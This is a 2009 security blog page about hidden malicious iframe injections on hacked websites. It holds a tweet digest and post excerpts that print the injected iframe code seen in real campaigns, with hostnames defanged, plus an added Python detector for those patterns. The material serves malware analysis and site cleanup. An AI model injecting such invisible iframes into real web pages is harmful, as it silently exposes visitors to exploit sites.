Unmask Parasites - Check your web pages for hidden links, iframes, malicious scripts, unauthorized redirects and other signs of security problems.

Tweet Week: Oct 26 – Nov 1, 2009

01 Nov 09   Filed in Tweet Week with Comments Off

Selected short messages and links you might have missed if you don’t follow me on Twitter.

Oct 26, 2009

[link:Sophos blog] New type of hidden malicious iframes

Oct 28, 2009

[milestone] 50 blog posts on http://blog.UnmaskParasites.com (in less than a year)

Security updates are available for Firefox 3/3.5 and Opera 10. Make sure to update your browser ASAP

Oct 30, 2009

I published a “beta” of my Practical Guide to Dealing With Google’s Malware Warnings – need your feedback. Thanks

[link:ottodestruct.com] How to find a backdoor in a hacked WordPress – great article

Oliver Fisher (Google Anti-Malware) on Google’s automated malware scanners and warnings

If you want more real-time experience, you can follow @unmaskparasites on Twitter.

Similar posts:

Buggy Malware: Iframes Eat Web Pages

29 Oct 09   Filed in Website exploits with 7 Comments

Yesterday, when I wrote about hidden iframes I forgot to mention one interesting side effect of the new iframes with “onload” scripts – they eat web pages.

Actually, those iframes don’t eat web pages themselves – it is done by buggy software that hackers use to inject hidden iframes into legitimate web pages.

Evolution of Hidden Iframes

28 Oct 09   Filed in Website exploits with 12 Comments

Injecting hidden malicious iframes into compromised legitimate websites is one of the most popular types of malware attacks. Invisible iframes allow attackers to silently load exploits from “bad” sites while unsuspecting web surfers browse the visible content of infected websites.

Iframes are rectangular elements of web pages where you can load other web pages, either from the same site or from some third-party site (in other words: a web page inside a web page). There are many legitimate uses of iframes. The most common is ad blocks (e.g. Google displays AdSense in iframes).

Hiding iframes

As said above, iframes are rectangular elements that occupy some space on web pages. So how do hackers make them invisible?

Quicksilver Malware Network

17 Sep 09   Filed in Website exploits with 6 Comments

In my latest post about the iframe attack that used free domains from dynamic DNS hosting providers pointing to a network of compromised dedicated servers, I asked readers for any additional information they might have about this attack. A few days later I received this email:

Hi there.

Since this May I have been watching this network (I named it “quicksilver”) after two PCs/users ran into cn-8080-iframe-modified websites. Using only “white hat” instruments (dig, whois, malzilla, VMWare, Google and my brain ;) ) I was able to collect information about the basic frame of this network.

It is not a simple botnet – it combines three networks with different functions to form a “malware superstructure”.

Nearly everything in this network is constantly moving (thus the name) and uses compromised machines acting as proxies or slaves. The machines of the real black hats are movable themselves – the older “gumblar” network (which I think is a precursor to quicksilver) used a Ukrainian C&C server with a different IP address.

At the end of the email, the reader said that he had a chart of this network and asked me if I wanted to take a look at it. The information looked interesting so I asked if he would like to publish it on my blog and got his permission:

you have my explicit permission to publish everything I send you – anonymously. Although I have a name and a title, the only thing relevant is to unmask those networks.

So here it is. I’ve published the story as is. I just added some formatting and converted the chart to GIF format to avoid PDF security concerns.

Dynamic DNS and Botnet of Zombie Web Servers

11 Sep 09   Filed in Website exploits with 44 Comments

It’s always interesting to watch how malware attacks evolve over time.

Since this spring, when I started to distinguish it from other attacks, this hidden iframe injection attack has always been among “leaders”.

  • They started with gambling-related .cn domains (like cheapslotplay .cn).
  • They introduced several new domain names every day so that you couldn’t hardcode them in your scanners. At this point, my records contain several hundred domains used in this attack.
  • They also changed campaign names (parameters they specify in iframe URLs) regularly: mozila, banner, cocacola, pepsi, open, reopen, income.
  • They used port 8080 (presumably to game dumb traffic filters that only inspect traffic on port 80).
  • At the end of July, they started to use 3-letter .ru, .pl, .in and .at domains (e.g. x3y .ru, f7y .at, q5n .in, a3j .pl).
  • And, finally, if you follow me on Twitter, you know that this week I started to notice 3rd-level domains registered with free dynamic DNS services.


Hidden CN Iframes Are Still Prevalent

25 Jun 09   Filed in Website exploits with 33 Comments

This post is a reminder that .cn iframe attacks are still among leaders.

The URLs of malicious iframes change over time. Hackers introduce new suffixes (campaigns?) like: mozila, banner, cocacola, pepsi, and add more and more domain names.

Port 8080

Since the pepsi campaign they started using port 8080 in the URLs.

The current form of the malicious code looks like this:

< iframe src="http:// namegamestore .cn:8080/index.php" width=118 height=195 style="visibility: hidden"></iframe>

It is usually injected at the bottom of index (home) pages.

Another Type of IFrame Hack (PHP Exploit)

29 Apr 09   Filed in Website exploits with 36 Comments

This is a quick post about yet another type of hidden iframes injected into legitimate web pages.

The HTML code may look like this:

<iframe src="http:// xtrarobotz .com/?click=BC0230" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

Domain names may vary, and the number of different iframes injected into a single web page may vary too. The distinguishing feature of this exploit is the “?click=<hex_number>” part of the URL, where <hex_number> is some hexadecimal number.

Malicious “Income” IFrames from .CN Domains

15 Apr 09   Filed in Website exploits with 78 Comments

New week, new leader. I mean various hidden iframes from .cn domains injected at the bottom of home pages.

The HTML code looks like this:

<iframe src="http: //lotmachinesguide .cn/ in.cgi?income56" width=1 height=1 style="visibility: hidden"></iframe>

The domain names may vary, but they always end with .cn. The domain names usually contain the words “lot” and “bet”. They all reside on the same server with the IP address 94 .247 .3 .150. The iframes load pages with paths similar to “in.cgi?incomeNN”, where NN is some arbitrary number.
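A small detector for the hidden-iframe patterns documented in the three excerpts above (CSS-hidden frames, 1x1 pixel frames, port 8080, the “?click=<hex>” parameter and the “in.cgi?incomeNN” path). This is an added example written for this page, not the Unmask Parasites scanner; the sample page and its hostnames are constructed placeholders.

```python
"""Flag <iframe> tags that match the hidden-iframe patterns described above."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse


class IframeCollector(HTMLParser):
    """Collect every <iframe> start tag with its attributes (keys lower-cased)."""
    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def _is_tiny(value):
    """True for a 0- or 1-pixel dimension (the width=1 height=1 trick)."""
    m = re.match(r"^\s*(\d+)", value)
    return m is not None and int(m.group(1)) <= 1


def _port(url):
    """urlparse validates the port lazily; treat garbage ports as None."""
    try:
        return url.port
    except ValueError:
        return None


def suspicious_iframe_reasons(attrs):
    """Return the page-documented red flags for one iframe (empty list if benign)."""
    reasons = []
    style = re.sub(r"\s+", "", attrs.get("style", "").lower())
    url = urlparse(attrs.get("src", ""))
    if "visibility:hidden" in style:
        reasons.append("hidden via CSS")
    if _is_tiny(attrs.get("width", "")) and _is_tiny(attrs.get("height", "")):
        reasons.append("1x1 pixel frame")
    if _port(url) == 8080:
        reasons.append("non-standard port 8080")
    if re.fullmatch(r"click=[0-9A-Fa-f]+", url.query):
        reasons.append("?click=<hex> campaign parameter")
    if url.path.endswith("in.cgi") and re.fullmatch(r"income\d+", url.query):
        reasons.append("in.cgi?incomeNN campaign path")
    return reasons


def scan_html(html):
    """Map each suspicious iframe src to its reasons; benign iframes are omitted."""
    parser = IframeCollector()
    parser.feed(html)
    found = {f.get("src", ""): suspicious_iframe_reasons(f) for f in parser.iframes}
    return {src: why for src, why in found.items() if why}


# Constructed sample page: one legitimate ad iframe and three injected ones.
SAMPLE_PAGE = """<html><body><p>Legitimate content</p>
<iframe src="https://ads.example/adsense" width="300" height="250"></iframe>
<iframe src="http://bad1.example:8080/index.php" width=118 height=195 style="visibility: hidden"></iframe>
<iframe src="http://bad2.example/?click=BC0230" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
<iframe src="http://bad3.example/in.cgi?income56" width=1 height=1 style="visibility: hidden"></iframe>
</body></html>"""

if __name__ == "__main__":
    for src, why in scan_html(SAMPLE_PAGE).items():
        print(src, "->", ", ".join(why))
```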

Gogo2me – Hidden IFrame Injection.

14 Jan 09   Filed in Website exploits with 29 Comments

New Year has come with a new surge of website exploits. I see many help requests on BadwareBusters caused by the same problem.

Symptoms

  1. In Google search results, your site links are marked with a “This site may harm your computer” warning and you see an abrupt decrease in Google search traffic.
  2. When trying to open your web pages, users of Firefox 3 and Google Chrome browsers see a warning that your site is an “attack site”.
  3. If your site is registered with Google Webmaster Tools or AdWords, you receive an email from Google notifying that your site is a reported attack site and some of your web pages link to the following sites that host malicious software: 94 .247 .2 .0/ and gogo2me .net/
  4. Google’s Safe Browsing Diagnostics pages for your site also report that your site links to 94 .247 .2 .0/ and gogo2me .net/
